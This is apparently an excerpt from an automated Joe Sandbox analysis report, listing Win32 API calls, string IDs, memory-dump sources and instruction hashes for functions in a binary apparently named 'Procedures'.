                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00EAD221
                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00EAD2AD
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00EAD2E1
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EAD2EE
                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00EAD3C0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                                                    • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                                                    • Opcode ID: 065dd39cf197915982a593f4211803799ebc93309822a95c8235f73d98c717ef
                                                                                                                                                                                                                                                                                                    • Instruction ID: e4a922c07ac65e8b2b9dcde524125603084e5421983aea8562fc575462ed6b01
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 065dd39cf197915982a593f4211803799ebc93309822a95c8235f73d98c717ef
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA1268356042119FDB14DF14D981B2AB7E6EF89714F15989CF88AAB3A2CB31FD41CB81
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00EB1462
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB149D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EB14F0
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB1526
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB15A2
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB161D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E3FD52: _wcslen.LIBCMT ref: 00E3FD5D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E83535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E83547
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                                                    • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8acf476b07446f6ad5c432fef7e60cdcf70f236ffea9858f656c8e6f219985fc
                                                                                                                                                                                                                                                                                                    • Instruction ID: ddfc59d557dd049493a94506d55f9bb8ad90de23e77b222d224418e35ae1886a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8acf476b07446f6ad5c432fef7e60cdcf70f236ffea9858f656c8e6f219985fc
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92E1B0316083518FC714DF24C5609ABB7E2BF94324B54699DF89ABB361DB30ED45CB81
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                                                    • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                                                    • Opcode ID: e1567c3b11899f68ac6ef6d1c4cbaaf89a9363444ad656609b72f2317048c4e8
                                                                                                                                                                                                                                                                                                    • Instruction ID: 42c42890290e184c42f40e1684c1513fd05119271f38253ba07c3c31ce71dad7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1567c3b11899f68ac6ef6d1c4cbaaf89a9363444ad656609b72f2317048c4e8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18710B72A0811A8BCB109E78CD415FE3391AFAA75CB152125F867BF694EB35ED44C390
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB8DB5
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB8DC9
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB8DEC
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB8E0F
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00EB8E4D
                                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00EB6691), ref: 00EB8EA9
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EB8EE2
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00EB8F25
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EB8F5C
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00EB8F68
                                                                                                                                                                                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EB8F78
                                                                                                                                                                                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,00EB6691), ref: 00EB8F87
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00EB8FA4
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00EB8FB0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                                    • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                                                    • Opcode ID: b45b6d8475cead7373f454d5c891181897899d9c38fef5c559a991516fdb8650
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9d16f6cca8f55bf1175b16a1fc26f885cd9d1be5d37c0ad3c0b40eb4522fbd08
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b45b6d8475cead7373f454d5c891181897899d9c38fef5c559a991516fdb8650
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1561CEB1A00219BEEB149F64DD41BFF77ACAF08B14F105206F915F62D1EB74A990CBA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00E9493D
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E94948
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E9499F
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E949DD
                                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 00E94A1B
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E94A63
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E94A9E
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E94ACC
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                                    • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1ecf58c1c3e58d1e2bce23cc3ddd69f3277009a08f4917b80f3a6fb8fde6b922
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4e1c30bfa281fdce85084793fe90561a59159f31a7ed39cf8d984cf63baff26e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ecf58c1c3e58d1e2bce23cc3ddd69f3277009a08f4917b80f3a6fb8fde6b922
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C071E3B25083168FC710EF24D84196BB7E4EF98758F10692DF895B7291EB30DD46CB91
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00E86395
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E863A7
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00E863BE
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00E863D3
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00E863D9
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00E863E9
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00E863EF
                                                                                                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E86410
                                                                                                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E8642A
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00E86433
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8649A
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00E864D6
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00E864DC
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00E864E3
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00E8653A
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00E86547
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 00E8656C
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E86596
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 895679908-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 829fff4aa223bb741d9ef04375db6e9bbab1c76d0d57874a00e337e921a29e98
                                                                                                                                                                                                                                                                                                    • Instruction ID: 80037425a70cdfe4975a1dbb4fc0c7d98086fe37ed80a3bd7ca9b3a13d1a63c1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 829fff4aa223bb741d9ef04375db6e9bbab1c76d0d57874a00e337e921a29e98
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81718E31900705AFDB20EFA9CE45BAEBBF5FF48704F101928E59AB25A0D775E944CB50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00EA0884
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00EA088F
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00EA089A
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00EA08A5
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00EA08B0
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00EA08BB
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00EA08C6
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00EA08D1
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00EA08DC
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00EA08E7
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00EA08F2
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00EA08FD
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00EA0908
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00EA0913
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00EA091E
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00EA0929
                                                                                                                                                                                                                                                                                                    • GetCursorInfo.USER32(?), ref: 00EA0939
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00EA097B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c61d114ac659271d0e84e9a4c7822d8dc2180fe00b796f146a9e27f79b7cfee8
                                                                                                                                                                                                                                                                                                    • Instruction ID: e827d6c817cc012fafcb0896a7857603b52824a104818b5709b75bf9e081f7f2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c61d114ac659271d0e84e9a4c7822d8dc2180fe00b796f146a9e27f79b7cfee8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5413370D083196ADB109FBA8C8985FBFE8FF48754B50452AA158FB291DA78A901CF91
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k
                                                                                                                                                                                                                                                                                                    • API String ID: 176396367-2171760788
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8842a277dff8b4ea24604a74d655c5e9aae710e8facad28271388548fbe6feea
                                                                                                                                                                                                                                                                                                    • Instruction ID: 794b347e3c3ecbdacac2198dd6ed3e9e2779cc83d7c2878b870614f4f3906a9d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8842a277dff8b4ea24604a74d655c5e9aae710e8facad28271388548fbe6feea
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FEE1E432E00616ABCB18AFB4C8417EEFBB5BF54B54F146129E45EF7250EB30AE458790
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00EB9BA3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EB80AE: ClientToScreen.USER32(?,?), ref: 00EB80D4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EB80AE: GetWindowRect.USER32(?,?), ref: 00EB814A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EB80AE: PtInRect.USER32(?,?,?), ref: 00EB815A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00EB9C0C
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EB9C17
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EB9C3A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EB9C81
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00EB9C9A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00EB9CB1
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00EB9CD3
                                                                                                                                                                                                                                                                                                    • DragFinish.SHELL32(?), ref: 00EB9CDA
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00EB9DCD
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$($(
                                                                                                                                                                                                                                                                                                    • API String ID: 221274066-1080139498
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4b4fa4484a67b23e82374c8fc2c7dcc51eaa4123b8c0dd5aabb8dcc9f2ad5508
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6d1956f9cb1202366bf37a2237d33906574fe367579ffa7e9cf650ddcd2a3cd2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b4fa4484a67b23e82374c8fc2c7dcc51eaa4123b8c0dd5aabb8dcc9f2ad5508
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10617971108315AFC705EF61DC85DAFBBE8EFC8750F001A1EF691A22A1DB709A49CB52
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00E40436
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E4045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00EF170C,00000FA0,CBF75EA1,?,?,?,?,00E62733,000000FF), ref: 00E4048C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E4045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00E62733,000000FF), ref: 00E40497
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E4045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00E62733,000000FF), ref: 00E404A8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E4045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00E404BE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E4045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00E404CC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E4045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00E404DA
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E4045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E40505
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E4045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E40510
                                                                                                                                                                                                                                                                                                    • ___scrt_fastfail.LIBCMT ref: 00E40457
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E40413: __onexit.LIBCMT ref: 00E40419
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00E40492
                                                                                                                                                                                                                                                                                                    • InitializeConditionVariable, xrefs: 00E404B8
                                                                                                                                                                                                                                                                                                    • WakeAllConditionVariable, xrefs: 00E404D2
